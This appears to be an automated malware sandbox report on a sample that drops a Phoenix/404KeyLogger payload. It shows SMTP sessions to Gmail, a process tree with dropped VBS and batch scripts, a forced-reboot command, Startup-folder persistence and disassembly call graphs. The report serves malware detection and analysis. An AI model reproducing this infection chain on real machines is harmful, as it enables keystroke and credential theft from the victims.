                                                      Feb 3, 2022 08:59:17.681364059 CET49731587192.168.2.3108.177.127.109EHLO 066656
                                                      Feb 3, 2022 08:59:17.712292910 CET58749731108.177.127.109192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:17.712712049 CET49731587192.168.2.3108.177.127.109STARTTLS
                                                      Feb 3, 2022 08:59:17.739829063 CET58749731108.177.127.109192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:19.285574913 CET58749732108.177.127.109192.168.2.3220 smtp.gmail.com ESMTP lf16sm16395436ejc.25 - gsmtp
                                                      Feb 3, 2022 08:59:19.285815001 CET49732587192.168.2.3108.177.127.109EHLO 066656
                                                      Feb 3, 2022 08:59:19.314433098 CET58749732108.177.127.109192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:19.318312883 CET49732587192.168.2.3108.177.127.109STARTTLS
                                                      Feb 3, 2022 08:59:19.345017910 CET58749732108.177.127.109192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:21.073447943 CET58749733108.177.127.109192.168.2.3220 smtp.gmail.com ESMTP qb30sm16358295ejc.27 - gsmtp
                                                      Feb 3, 2022 08:59:21.073920012 CET49733587192.168.2.3108.177.127.109EHLO 066656
                                                      Feb 3, 2022 08:59:21.103950024 CET58749733108.177.127.109192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:21.104202986 CET49733587192.168.2.3108.177.127.109STARTTLS
                                                      Feb 3, 2022 08:59:21.131654024 CET58749733108.177.127.109192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:22.539638042 CET58749736108.177.127.108192.168.2.3220 smtp.gmail.com ESMTP c8sm21939424edr.70 - gsmtp
                                                      Feb 3, 2022 08:59:22.540071011 CET49736587192.168.2.3108.177.127.108EHLO 066656
                                                      Feb 3, 2022 08:59:22.569442034 CET58749736108.177.127.108192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:22.573251963 CET49736587192.168.2.3108.177.127.108STARTTLS
                                                      Feb 3, 2022 08:59:22.599992990 CET58749736108.177.127.108192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:24.078610897 CET58749737108.177.127.108192.168.2.3220 smtp.gmail.com ESMTP s20sm9930340edq.55 - gsmtp
                                                      Feb 3, 2022 08:59:24.078831911 CET49737587192.168.2.3108.177.127.108EHLO 066656
                                                      Feb 3, 2022 08:59:24.107564926 CET58749737108.177.127.108192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:24.107850075 CET49737587192.168.2.3108.177.127.108STARTTLS
                                                      Feb 3, 2022 08:59:24.134658098 CET58749737108.177.127.108192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:25.609972000 CET58749738108.177.127.108192.168.2.3220 smtp.gmail.com ESMTP j25sm9589789edp.10 - gsmtp
                                                      Feb 3, 2022 08:59:25.610321999 CET49738587192.168.2.3108.177.127.108EHLO 066656
                                                      Feb 3, 2022 08:59:25.639573097 CET58749738108.177.127.108192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:25.639858007 CET49738587192.168.2.3108.177.127.108STARTTLS
                                                      Feb 3, 2022 08:59:25.666827917 CET58749738108.177.127.108192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:27.176767111 CET58749739108.177.127.108192.168.2.3220 smtp.gmail.com ESMTP i6sm16675179eja.132 - gsmtp
                                                      Feb 3, 2022 08:59:27.177041054 CET49739587192.168.2.3108.177.127.108EHLO 066656
                                                      Feb 3, 2022 08:59:27.206545115 CET58749739108.177.127.108192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:27.206803083 CET49739587192.168.2.3108.177.127.108STARTTLS
                                                      Feb 3, 2022 08:59:27.233695030 CET58749739108.177.127.108192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:28.860888004 CET58749740108.177.127.108192.168.2.3220 smtp.gmail.com ESMTP jl17sm16857135ejc.13 - gsmtp
                                                      Feb 3, 2022 08:59:28.861144066 CET49740587192.168.2.3108.177.127.108EHLO 066656
                                                      Feb 3, 2022 08:59:28.890958071 CET58749740108.177.127.108192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:28.891179085 CET49740587192.168.2.3108.177.127.108STARTTLS
                                                      Feb 3, 2022 08:59:28.918123960 CET58749740108.177.127.108192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:31.472426891 CET58749741108.177.127.108192.168.2.3220 smtp.gmail.com ESMTP kw5sm9263497ejc.140 - gsmtp
                                                      Feb 3, 2022 08:59:31.472690105 CET49741587192.168.2.3108.177.127.108EHLO 066656
                                                      Feb 3, 2022 08:59:31.502537966 CET58749741108.177.127.108192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:31.502799034 CET49741587192.168.2.3108.177.127.108STARTTLS
                                                      Feb 3, 2022 08:59:31.529670000 CET58749741108.177.127.108192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:33.036221027 CET58749742108.177.127.108192.168.2.3220 smtp.gmail.com ESMTP q10sm16536655ejn.3 - gsmtp
                                                      Feb 3, 2022 08:59:33.036501884 CET49742587192.168.2.3108.177.127.108EHLO 066656
                                                      Feb 3, 2022 08:59:33.066116095 CET58749742108.177.127.108192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:33.069794893 CET49742587192.168.2.3108.177.127.108STARTTLS
                                                      Feb 3, 2022 08:59:33.096498966 CET58749742108.177.127.108192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 08:59:59.097150087 CET58749783108.177.127.108192.168.2.3220 smtp.gmail.com ESMTP s20sm9930881edq.55 - gsmtp
                                                      Feb 3, 2022 08:59:59.097692966 CET49783587192.168.2.3108.177.127.108EHLO 066656
                                                      Feb 3, 2022 08:59:59.124309063 CET58749783108.177.127.108192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 08:59:59.125524044 CET49783587192.168.2.3108.177.127.108STARTTLS
                                                      Feb 3, 2022 08:59:59.152338982 CET58749783108.177.127.108192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 09:00:51.965066910 CET58749807108.177.127.108192.168.2.3220 smtp.gmail.com ESMTP rv9sm16294870ejb.216 - gsmtp
                                                      Feb 3, 2022 09:00:51.965645075 CET49807587192.168.2.3108.177.127.108EHLO 066656
                                                      Feb 3, 2022 09:00:51.996684074 CET58749807108.177.127.108192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 09:00:51.997289896 CET49807587192.168.2.3108.177.127.108STARTTLS
                                                      Feb 3, 2022 09:00:52.024177074 CET58749807108.177.127.108192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 09:01:39.696830034 CET58749808108.177.127.109192.168.2.3220 smtp.gmail.com ESMTP w11sm21991315edt.3 - gsmtp
                                                      Feb 3, 2022 09:01:39.697171926 CET49808587192.168.2.3108.177.127.109EHLO 066656
                                                      Feb 3, 2022 09:01:39.726594925 CET58749808108.177.127.109192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 09:01:39.726897001 CET49808587192.168.2.3108.177.127.109STARTTLS
                                                      Feb 3, 2022 09:01:39.753705025 CET58749808108.177.127.109192.168.2.3220 2.0.0 Ready to start TLS
                                                      Feb 3, 2022 09:02:27.852813005 CET58749809108.177.127.109192.168.2.3220 smtp.gmail.com ESMTP rn16sm5988400ejb.61 - gsmtp
                                                      Feb 3, 2022 09:02:27.857212067 CET49809587192.168.2.3108.177.127.109EHLO 066656
                                                      Feb 3, 2022 09:02:27.887156010 CET58749809108.177.127.109192.168.2.3250-smtp.gmail.com at your service, [102.129.143.61]
                                                      250-SIZE 35882577
                                                      250-8BITMIME
                                                      250-STARTTLS
                                                      250-ENHANCEDSTATUSCODES
                                                      250-PIPELINING
                                                      250-CHUNKING
                                                      250 SMTPUTF8
                                                      Feb 3, 2022 09:02:27.887464046 CET49809587192.168.2.3108.177.127.109STARTTLS
                                                      Feb 3, 2022 09:02:27.914325953 CET58749809108.177.127.109192.168.2.3220 2.0.0 Ready to start TLS

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:1
                                                      Start time:08:58:37
                                                      Start date:03/02/2022
                                                      Path:C:\Users\user\Desktop\2cB42TzofC.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\2cB42TzofC.exe"
                                                      Imagebase:0xa00000
                                                      File size:619950 bytes
                                                      MD5 hash:F47DDF38902E6E745AE49168BC55C0FC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low

                                                      General

                                                      Target ID:7
                                                      Start time:08:58:39
                                                      Start date:03/02/2022
                                                      Path:C:\Users\Public\Downloads\systems.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\Public\Downloads\systems.exe"
                                                      Imagebase:0x220000
                                                      File size:318464 bytes
                                                      MD5 hash:9FBC8CDC78C518EBF6774752EC178B13
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 00000007.00000000.289663660.0000000000222000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 00000007.00000000.289663660.0000000000222000.00000002.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 00000007.00000002.812023863.0000000000222000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 00000007.00000002.812023863.0000000000222000.00000002.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: C:\Users\Public\Downloads\systems.exe, Author: Joe Security
                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: C:\Users\Public\Downloads\systems.exe, Author: ditekSHen
                                                      • Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: C:\Users\Public\Downloads\systems.exe, Author: ditekSHen
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 89%, ReversingLabs
                                                      Reputation:low

                                                      General

                                                      Target ID:8
                                                      Start time:08:58:40
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\vbs.vbs"
                                                      Imagebase:0xe90000
                                                      File size:147456 bytes
                                                      MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:9
                                                      Start time:08:58:44
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\vbs.bat" "
                                                      Imagebase:0xd80000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:10
                                                      Start time:08:58:44
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7f20f0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:11
                                                      Start time:08:58:45
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\SysWOW64\shutdown.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:shutdown -r -t 50
                                                      Imagebase:0x1130000
                                                      File size:23552 bytes
                                                      MD5 hash:E2EB9CC0FE26E28406FB6F82F8E81B26
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      General

                                                      Target ID:13
                                                      Start time:08:58:57
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
                                                      Imagebase:0xa40000
                                                      File size:3611360 bytes
                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:14
                                                      Start time:08:58:57
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                      Imagebase:0x7ff720ea0000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:26
                                                      Start time:09:00:06
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
                                                      Imagebase:0xa40000
                                                      File size:3611360 bytes
                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:27
                                                      Start time:09:00:07
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                      Imagebase:0x7ff720ea0000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:29
                                                      Start time:09:00:14
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
                                                      Imagebase:0xa40000
                                                      File size:3611360 bytes
                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:30
                                                      Start time:09:00:15
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                      Imagebase:0x7ff71aa50000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:31
                                                      Start time:09:00:23
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
                                                      Imagebase:0xa40000
                                                      File size:3611360 bytes
                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:32
                                                      Start time:09:00:23
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                      Imagebase:0x7ff720ea0000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:33
                                                      Start time:09:00:31
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
                                                      Imagebase:0xa40000
                                                      File size:3611360 bytes
                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:34
                                                      Start time:09:00:31
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                      Imagebase:0x7ff720ea0000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:36
                                                      Start time:09:00:37
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
                                                      Imagebase:0xa40000
                                                      File size:3611360 bytes
                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:37
                                                      Start time:09:00:39
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                      Imagebase:0x7ff720ea0000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:39
                                                      Start time:09:00:46
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
                                                      Imagebase:0xa40000
                                                      File size:3611360 bytes
                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:40
                                                      Start time:09:00:47
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                      Imagebase:0x7ff720ea0000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:42
                                                      Start time:09:00:53
                                                      Start date:03/02/2022
                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
                                                      Imagebase:0xa40000
                                                      File size:3611360 bytes
                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:10.6%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:9.9%
                                                        Total number of Nodes:1549
                                                        Total number of Limit Nodes:26
                                                        execution_graph 25160 a2baa0 GetProcessHeap 25161 a29ea0 21 API calls 2 library calls 25162 a1eea7 20 API calls 23257 a013a7 83 API calls 3 library calls 25205 a1c0d9 106 API calls 3 library calls 25164 a1ecb0 46 API calls 6 library calls 25206 a19db0 GdipDisposeImage GdipFree ___InternalCxxFrameHandler 25207 a319b0 CloseHandle 25166 a15eb8 120 API calls __vswprintf_c_l 25167 a1eebb 28 API calls 2 library calls 25168 a18e80 GetClientRect 23382 a1ed82 23383 a1ed8e ___DestructExceptionObject 23382->23383 23408 a1e87a 23383->23408 23385 a1ed95 23387 a1edbe 23385->23387 23488 a1f1b5 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 23385->23488 23391 a1edfd ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23387->23391 23419 a2856d 23387->23419 23393 a1ee5d 23391->23393 23489 a27533 38 API calls 5 library calls 23391->23489 23392 a1eddd ___DestructExceptionObject 23427 a1f2d0 23393->23427 23403 a1ee89 23404 a1ee92 23403->23404 23490 a2791b 28 API calls _abort 23403->23490 23491 a1e9f1 13 API calls 2 library calls 23404->23491 23409 a1e883 23408->23409 23492 a1f00b IsProcessorFeaturePresent 23409->23492 23411 a1e88f 23493 a222b6 23411->23493 23413 a1e894 23418 a1e898 23413->23418 23502 a283c7 23413->23502 23416 a1e8af 23416->23385 23418->23385 23420 a28584 23419->23420 23421 a1eefa TranslatorGuardHandler 5 API calls 23420->23421 23422 a1edd7 23421->23422 23422->23392 23423 a28511 23422->23423 23425 a28540 23423->23425 23424 a1eefa TranslatorGuardHandler 5 API calls 23426 a28569 23424->23426 23425->23424 23426->23391 23552 a1f5f0 23427->23552 23430 a1ee63 23431 a284be 23430->23431 23554 a2b5a0 23431->23554 23433 a284c7 23434 a1ee6c 23433->23434 23558 a2b92b 38 API calls 23433->23558 23436 a1d891 23434->23436 23702 a103aa 23436->23702 23440 a1d8b0 23751 a1a5c6 23440->23751 23442 a1d8b9 23755 a116cb GetCPInfo 23442->23755 23444 a1d8c3 ___scrt_fastfail 23445 a1d8d6 GetCommandLineW 23444->23445 23446 a1d963 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23445->23446 23447 a1d8e5 23445->23447 23448 a03f8f _swprintf 51 API calls 23446->23448 23788 a1bf14 81 API calls 23447->23788 23450 a1d9ca SetEnvironmentVariableW GetModuleHandleW LoadIconW 23448->23450 23758 a1b07d LoadBitmapW 23450->23758 23451 a1d8eb 23453 a1d8f3 OpenFileMappingW 23451->23453 23454 a1d95d 23451->23454 23457 a1d953 CloseHandle 23453->23457 23458 a1d90c MapViewOfFile 23453->23458 23790 a1d544 SetEnvironmentVariableW SetEnvironmentVariableW 23454->23790 23457->23446 23460 a1d94a UnmapViewOfFile 23458->23460 23461 a1d91d __vswprintf_c_l 23458->23461 23460->23457 23789 a1d544 SetEnvironmentVariableW SetEnvironmentVariableW 23461->23789 23466 a18a75 8 API calls 23468 a1da27 DialogBoxParamW 23466->23468 23467 a1d939 23467->23460 23469 a1da61 23468->23469 23470 a1da73 Sleep 23469->23470 23471 a1da7a 23469->23471 23470->23471 23474 a1da88 23471->23474 23791 a1a7d4 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 23471->23791 23473 a1daa7 DeleteObject 23475 a1dac3 23473->23475 23476 a1dabc DeleteObject 23473->23476 23474->23473 23477 a1daf4 23475->23477 23478 a1db06 23475->23478 23476->23475 23792 a1d5a3 6 API calls 23477->23792 23785 a1a62e 23478->23785 23480 a1dafa CloseHandle 23480->23478 23482 a1db40 23483 a2784f GetModuleHandleW 23482->23483 23484 a1ee7f 23483->23484 23484->23403 23485 a27978 23484->23485 24029 a276f5 23485->24029 23488->23385 23489->23393 23490->23404 23491->23392 23492->23411 23494 a222bb ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23493->23494 23506 a233be 23494->23506 23498 a222d1 23499 a222dc 23498->23499 23520 a233fa DeleteCriticalSection 23498->23520 23499->23413 23501 a222c9 23501->23413 23548 a2baca 23502->23548 23505 a222df 8 API calls 3 library calls 23505->23418 23508 a233c7 23506->23508 23509 a233f0 23508->23509 23511 a222c5 23508->23511 23521 a23652 23508->23521 23526 a233fa DeleteCriticalSection 23509->23526 23511->23501 23512 a223fc 23511->23512 23541 a23567 23512->23541 23514 a22406 23519 a22411 23514->23519 23546 a23615 6 API calls try_get_function 23514->23546 23516 a2241f 23517 a2242c 23516->23517 23547 a2242f 6 API calls ___vcrt_FlsFree 23516->23547 23517->23498 23519->23498 23520->23501 23527 a23446 23521->23527 23524 a23689 InitializeCriticalSectionAndSpinCount 23525 a23675 23524->23525 23525->23508 23526->23511 23528 a2347a 23527->23528 23531 a23476 23527->23531 23528->23524 23528->23525 23529 a2349a 23529->23528 23532 a234a6 GetProcAddress 23529->23532 23531->23528 23531->23529 23534 a234e6 23531->23534 23533 a234b6 __crt_fast_encode_pointer 23532->23533 23533->23528 23535 a2350e LoadLibraryExW 23534->23535 23538 a23503 23534->23538 23536 a23542 23535->23536 23537 a2352a GetLastError 23535->23537 23536->23538 23539 a23559 FreeLibrary 23536->23539 23537->23536 23540 a23535 LoadLibraryExW 23537->23540 